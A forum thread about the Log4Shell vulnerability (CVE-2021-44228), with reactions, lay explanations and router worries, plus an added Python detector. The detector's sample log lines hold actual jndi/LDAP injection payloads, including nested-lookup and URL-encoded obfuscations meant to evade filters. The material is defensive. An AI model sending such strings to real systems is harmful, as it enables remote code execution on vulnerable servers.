The CVE-2021-44228 vulnerability is serious because it’s being exploited already, allows arbitrary code execution, and the library in question may be present in any system that is (directly or indirectly) based on Java.
Here I’ve seen the governments of Canada and Québec take down all their websites; their respective home pages were back online soon after, with a message about most of their other online systems getting turned back on progressively when they’re verified as secure. Of course, a government can afford to do this.
But I haven’t seen many businesses do the same. I suspect two of the financial institutions I do business with of using Java extensively in their Web-facing systems, yet they haven’t taken down their sites and haven’t even published anything saying “We’ve checked and we’re not affected”. Of course, a bank that took down its own website for more than a few hours would be at serious risk of losing customers. Their IT staff are probably checking their systems frantically nonetheless.
What have you seen as a response so far, in your areas? Sites taken down, reassuring messages, etc.?
Surprisingly little. I’ve had calls from a few clients to confirm that a) we weren’t vulnerable and b) nothing we have done for them is affected.
We’re a 100% Microsoft shop, so no Java for us. I did have to update our network controller software, but the vendor had an updated version out on Friday.
Nvidia put out a notice on their security page (which I check to see if I need to update my drivers). They simply say they’re investigating if they need to make any changes and will update as they do.
At my office, we started working on mitigating the problem this Saturday, and although the systems that I work with were taken care of then (with a few minutes of downtime), additional work continued until yesterday. I also should clarify that it is not all Java-based systems, just the ones that use that particular library. It is widely used by web servers and the like, but just having Java on your system does not automatically mean you have Log4j.
Minecraft (both servers and Java clients) does make use of it, so Minecraft users were notified over the weekend to upgrade both. They don’t control the servers that people have spun up on their own, so they can’t do much on their end, other than provide a way to update for those.
Could someone please translate that into non-tech for us end users? I gather this is some sort of vulnerability, but I have no idea how this is relevant to me (other than !Danger, Will Robinson! alert that there is a security issue). What does the average (non-corporation) person need to know or do here?
There is a bug in a Java library that writes out logs. If the system is affected, you can put the exploit in a field in a web page that saves the entry for debugging and informational purposes. The component that handles the logging, log4j, unintentionally runs the code while trying to save the log, bypassing any security that would normally be in place.
This only affects systems that a) don’t cleanse the input, b) are running Java, and c) are using the affected versions of log4j. For example, my firewall runs Java, but they are not using a vulnerable version of log4j.
If your home internet router has this issue and is accessible from the internet, it could be a big issue. If it is accessible only from your home, it’s a much smaller risk.
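The “exploit in a field” described in the post above is a log4j lookup string of the form `${jndi:...}`, which log4j resolves (and fetches) while formatting the log message. Attackers rarely send it in plain form; the string is usually wrapped in nested lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`) or URL-encoded so that a naive text search misses it. The following is an added example, not code from this thread or from the log4j project: it normalises those obfuscations and scans a handful of constructed web-server access-log lines for probes. The log lines, the `/a` path and the `198.51.100.7` address (from the RFC 5737 documentation range) are all made up for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) probe strings in web access logs.

Added example, not code from the thread or from log4j. The payload is a
log4j lookup ${jndi:...}; in the wild it is usually obfuscated with
nested lookups (${lower:j}, ${::-j}, ${env:NaN:-j}) and/or URL-encoded.
The normaliser below undoes those forms before matching. All sample
log lines are constructed; 198.51.100.7 is a documentation address.
"""
import re
from urllib.parse import unquote

# Innermost ${...} with no nested lookup inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are actually looking for once the obfuscation is peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(m):
    """Evaluate one innermost lookup the way log4j 2.x would.

    ${lower:X} -> x, ${upper:X} -> X, ${anything:-default} -> default
    (an undefined variable falls back to its default, which is how
    ${::-j} and ${env:NaN:-j} spell the letter 'j'). Any other lookup,
    including ${jndi:...} itself, is left intact so it still matches.
    """
    body = m.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.strip().lower() == "lower":
        return rest.lower()
    if sep and head.strip().lower() == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)


def normalize(text, max_rounds=10):
    """URL-decode (twice, for double encoding) and collapse nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):  # bounded: attacker controls nesting depth
        new = _INNER.sub(_resolve_inner, text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line):
    """True if the line contains a jndi lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line_number, normalised_line) for every suspicious line."""
    return [(i, normalize(ln)) for i, ln in enumerate(lines, 1)
            if is_log4shell_probe(ln)]


# Constructed access-log sample (combined log format): one benign line,
# a plain probe, two obfuscated probes, a URL-encoded probe in the
# query string, and a non-jndi lookup that should NOT be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [11/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:10:00:05 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.5 - - [11/Dec/2021:10:00:06 +0000] "POST /api HTTP/1.1" 200 12 "-" "app/1.0 ${sys:os.name}"',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

Running it flags lines 2 to 5 and leaves lines 1 and 6 alone. Two caveats a practitioner should keep in mind: the de-obfuscation here covers the common lookup tricks, not every one log4j supports, so a stricter rule for user-controlled headers is simply “any `${` at all”; and a clean scan says nothing about whether you are vulnerable, since the real check is an inventory of which log4j versions are on your systems, as the office post above describes.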
Our tech support is located in New Jersey or something. I’m sure they’re looking into it but unless they need protracted downtime to fix it we’ll never know what they might or might not need to do.
Well, basically, it’s a security hole that may affect server-based software and especially websites, if they are built using a certain set of tools and use some versions of a library called Log4j. Log4j is used for logging (writing technical logs about event sequences), and it costs nothing to use, so it’s included for troubleshooting purposes in many pieces of software. An attacker could execute code of their choosing, remotely, simply by putting in some specific text on a website form. Depending on the privilege level of the affected software, it may allow an attacker to install additional software, steal information, damage a website or a company’s corporate systems.
There isn’t much you can do as an ordinary citizen. It’s unlikely that the vulnerability would affect your phone or tablet, or even your PC or Mac.
ETA: Good point about the router, @FinsToTheLeft, I hadn’t thought about that. Yes, there is some danger in your home after all.
It’s more something your employer, your government, the companies you deal with, need to fix. You may be affected in various ways, as a direct or indirect user.
One non-technical analogy I’ve heard is that it’s like if someone sends you a postcard with a special message on it, then all the doors in your house unlock.
The reaction for my team has been a scramble to pull a release that was set to go out the door so we could patch it, and plan for two patches on earlier release streams to deliver the fix there. Some long calls with all our affected developers to craft a new schedule, analyze the impact on our systems, and write an advisory for customers detailing how they can adjust their configuration to alleviate the threat.
Just Google [Router Manufacturer] [Model] Log4J, and see if your router manufacturer has published updated firmware. If so, you should see instructions to download and update the firmware.
Our minister of Government Digital Transformation (the computer guy at the government) said that inspecting government systems for this vulnerability is like doing an inventory of all 60-watt light bulbs in all government buildings.
Java is popular on routers and modems? That just seems so odd to me. The ones I’ve seen always seemed like they were running some version of Linux with a custom shell, with a very basic webserver. Running Java on top of that would seem inefficient.
Then again, the web interface to the modem of my new ISP does seem to be a lot slower than my old one, despite the device itself being a lot larger. It actually shows a loading page in between every page load, which seems odd for what should be a simple HTTP server.
But I also can’t find anything related to Log4j about it. Just some security holes on old firmware versions.
Many basic (even appliance) web servers are written in Java. If you’re building your network appliance using open source components, Java may wind up in the mix.
Huh. Are they running Java natively, like old cell phones did? I’d think that native code would be needed for performance on such low end hardware (relative to PCs and phones).
Nope. Java runtime VMs are available for many of the SoC-type hardware that net appliances are now based on. Hardware performance has advanced quite a lot, and Java runtimes are a little more efficient than they used to be.
And the JVM isn’t running the core firewall/router functions. That’s still native code in kernel or high-privilege userland.